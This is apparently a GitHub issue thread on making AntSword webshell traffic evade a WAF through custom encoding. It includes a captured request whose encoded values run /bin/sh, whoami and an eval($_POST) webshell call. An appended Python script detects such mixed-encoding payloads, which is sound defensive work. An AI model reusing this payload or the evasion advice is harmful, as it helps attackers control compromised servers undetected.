Bug with encoder bypassing WAF #185
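All the data to be sent is in the `data` variable, so a for loop is all you need:
Note that the payload's decoding of this part is hardcoded as base64_decode, so if you convert everything to your own encoding, you need to convert the data in $_POST on the shell side first.
Here is a sample you can refer to: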
Medicean added a commit to AntSwordProject/AwesomeEncoder that referenced this issue Jun 3, 2019
I have indeed run into this problem too.
But adding more characters after == seems too obvious....
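Hello, while using the AntSword encoder, I wrote a PHP hex encoder.
Using the encoder above, the parameters can indeed be hex-encoded, and it bypassed the WAF.
But when executing system commands, it was blocked by the WAF. I captured the traffic and found that the request sent was the following: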
0x692baee12c5a1=L2Jpbi9zaA%3D%3D&0x88a4326879dc8=Y2QgIi9vcHQvbGFtcHAvaHRkb2NzL3dlYjE2MDUwNS9VcGxvYWRzL1BpY3R1cmUvMjAxNi0wNS0yNyI7d2hvYW1pO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXQ%3D%3D&_0x649657e994c51=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&pwd=206576616c287061636b2822482a222c245f504f53545b225f307836343936353765393934633531225d29293b
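The encoding at the end is indeed hex, and that can bypass the WAF, but the earlier 0x692baee12c5a1 and 0x88a4326879dc8 are base64-encoded; this is generated automatically by the system. It is this base64-encoded part that the WAF detected and blocked. How can I make my request fully encoded, rather than partially encoded?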
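Added example, not part of the original issue thread or the project's code: the request above mixes base64 and hex values, so a filter that inspects only one encoding sees only part of it. This Python sketch shows an inspection step that tries each encoding per parameter before matching; the signature list, function names and sample body are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote

# Illustrative signatures only (assumption); a production rule set is far larger.
SIGNATURES = re.compile(rb"/bin/(?:ba)?sh|\bwhoami\b|\beval\s*\(|\$_POST\b")
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2})+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def candidate_decodings(value):
    """Yield (encoding, bytes) for the raw value and each decoding that parses."""
    yield "raw", value.encode()
    if HEX_RE.fullmatch(value):
        yield "hex", bytes.fromhex(value)
    if len(value) % 4 == 0 and B64_RE.fullmatch(value):
        try:
            yield "base64", base64.b64decode(value, validate=True)
        except binascii.Error:
            pass  # looked like base64 but is not; ignore


def inspect_body(body):
    """Return (parameter, encoding, matched text) for every signature hit."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        for encoding, data in candidate_decodings(value):
            hit = SIGNATURES.search(data)
            if hit:
                findings.append((name, encoding, hit.group(0).decode()))
    return findings


# Constructed sample shaped like the request in the issue: base64 and hex mixed.
SAMPLE_BODY = "&".join([
    "0x1111=" + quote(base64.b64encode(b"/bin/sh").decode()),
    "0x2222=" + quote(base64.b64encode(b"whoami;pwd").decode()),
    "pwd=" + b'eval($_POST["x"]);'.hex(),
    "note=hello",
])

if __name__ == "__main__":
    for finding in inspect_body(SAMPLE_BODY):
        print(finding)
```

Because every parameter is checked under each encoding that parses, changing which values are hex and which are base64 does not change the result.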